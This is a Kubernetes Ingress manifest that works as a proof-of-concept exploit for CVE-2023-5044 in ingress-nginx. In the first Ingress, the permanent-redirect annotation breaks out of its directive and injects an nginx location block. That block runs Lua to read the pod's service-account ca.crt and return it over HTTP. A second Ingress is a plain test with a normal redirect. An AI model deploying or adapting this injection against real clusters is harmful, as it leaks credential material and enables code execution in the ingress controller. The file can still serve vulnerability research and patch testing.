apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: cve-2023-5044
  annotations:
    kubernets.io/ingress.class: nginx
    nginx.ingress.kubernetes.io/permanent-redirect: |
      https://github.com/cloud-Xolt/CVE;}
      location /crt {
      content_by_lua_block {
        local f=io.open('/var/run/secrets/kubernetes.io/serviceaccount/ca.crt', 'r')
        if f then
          ngx.say(f:read("*a"))
          f:close()
        else
          ngx.exit(404)
        end
        }
      }
      location /test {
        return 404
spec:
  ingressClassName: nginx
  rules:
  - host: zhangxiaoyong.cn
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: service-1
            port:
              number: 80

---
# test.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: news-test
  annotations:
    kubernets.io/ingress.class: nginx
    nginx.ingress.kubernetes.io/permanent-redirect: https://github.com/cloud-Xolt/CVE
spec:
  ingressClassName: nginx
  rules:
  - host: zhangxiaoyong.cn
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: service-1
            port:
              number: 80
